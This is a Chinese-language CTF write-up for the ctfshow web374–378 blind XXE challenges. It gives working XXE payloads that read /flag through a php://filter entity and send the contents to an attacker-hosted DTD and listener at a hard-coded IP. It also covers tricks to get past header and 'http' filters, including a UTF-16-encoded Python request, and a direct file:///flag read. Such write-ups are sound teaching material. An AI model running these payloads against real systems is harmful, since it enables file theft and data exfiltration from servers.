当前位置: 首页 > news >正文

xxe漏洞——无回显(ctfshow web374——378)

ctfshow——web374

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);    

比上题少了几行代码,分别是
$creds = simplexml_import_dom($dom); $ctfshow = $creds->ctfshow; echo $ctfshow;

导致了这题可以注入实体但是没有回显,所以我们考虑数据外带。访问一个请求,把数据加到请求上。

payload

<!DOCTYPE hacker[<!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
//参数实体 运用php伪协议读取flag<!ENTITY  % myurl SYSTEM "http://*******:1338/test.dtd">
//参数实体 外部引用自己vps上的dtd文件%myurl;
//引用参数
]>
<root>
1
</root>

在自己的vps上的test.dtd文件脚本

<!ENTITY % all "<!ENTITY &#x25; send  SYSTEM 'http://121.43.149.212:1337/%file;'> ">
%all;
%send;//解析后相当于
<!ENTITY % all "<!ENTITY &#x25; send  SYSTEM 'http://121.43.149.212:1337/%file;'> ">
<!ENTITY &#x25; send  SYSTEM 'http://121.43.149.212:1337/%file;'> 
http://121.43.149.212:1337/%file;
<!DOCTYPE hacker[<!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
//参数实体 运用php伪协议读取flaghttp://121.43.149.212:1337/%file;
]>

最后的引用来引用去的代码就相当于

请求访问攻击者服务器的1337端口

并且携带%file的参数

我们打开1338端口 使靶机能够正常访问

再监听1337端口

查看我们flag的值

解码可得flag

web375


error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){die('error');
}
if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__); 

相比上题过滤了<?xml version="1.0">

但是我看我上题的payload也没有<\?xml version="1.0">

证明就是可以直接不要xml头然后绕过

绕过方法二:

空格绕过,我多打一个空格在?xmlversion之间就好了。题目过滤的字符串,两个之间只有一个空格,我多打一个就变成了两个,不影响功能同时也绕过了过滤。

web376

和上面那题比多过滤了大小写

我们直接不加头

管他

web377


error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){die('error');
}
if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

比上题多ban了http

用python发请求

多个编码

import requests
url = 'https://eb566b22-4657-4de5-b251-7ddaded69bf8.challenge.ctf.show/'
data = '''
<!DOCTYPE hacker[<!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"><!ENTITY  % myurl SYSTEM "http://121.43.149.212:1338/test.dtd">%myurl;
]>
'''
r = requests.post(url=url,data=data.encode('utf-16'))

web378

和那个xxe lab撞js了;;;

用之间文件任意读取脚本


<!DOCTYPE root [
<!ELEMENT root ANY>
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>1</password></user>

http://www.lryc.cn/news/362762.html

相关文章:

  • 深入解读 Android Hook 技术-从原理到实践
  • 架构每日一学 15:想要提升协作效率,必须先统一语义
  • 基于树莓派4B设计的智能家居系统(华为云IOT)
  • 路由懒加载
  • 在Spring中实现资源的动态加载和卸载
  • Windows下 CLion中,配置 OpenCV、LibTorch
  • 机器学习知识点总结
  • OBproxy基础运维
  • 【Python】 探索Pytz库中的时区列表
  • C#操作MySQL从入门到精通(9)——Mysql中的数据类型以及对应的C#中的数据类型
  • 第六讲:AD、DA的工作原理及实现、运放电路
  • 计网ppt标黄知识点整理第(4)章节——谢希仁版本、期末复习自用
  • [数据集][目标检测]RSNA肺炎检测数据集VOC+YOLO格式6012张1类别
  • AndroidStudio中debug.keystore的创建和配置使用
  • 什么是最好的手机数据恢复软件?6 款手机数据恢复软件 [2024 年更新]
  • 力扣2653.滑动子数组的美丽值
  • 2024-06-04 架构-不同层次的抽象的处理-分析
  • MySQL——C语言连接数据库
  • 新能源汽车推行精益生产:绿色动力下的效率革命
  • FCA-九数云 试题及答案
  • qt dragEnterEvent dragLeaveEvent dragMoveEvent dropEvent都不响应的问题解决方案。
  • LVS精益价值管理系统 DownLoad.aspx 任意文件读取漏洞复现
  • 【GIC400】——中断使能
  • 容器项目之前后端分离
  • 游戏心理学Day04
  • 文件上传漏洞之upload-labs
  • 解决使用gets(getchar)函数无法输入字符(字符串)和scanf_s函数显示缺少“scanf_s”整型参数的问题
  • Excel的VLOOKUP函数的用法
  • 【Java面试】十三、ArrayList相关
  • 网络简史-基于图论的网络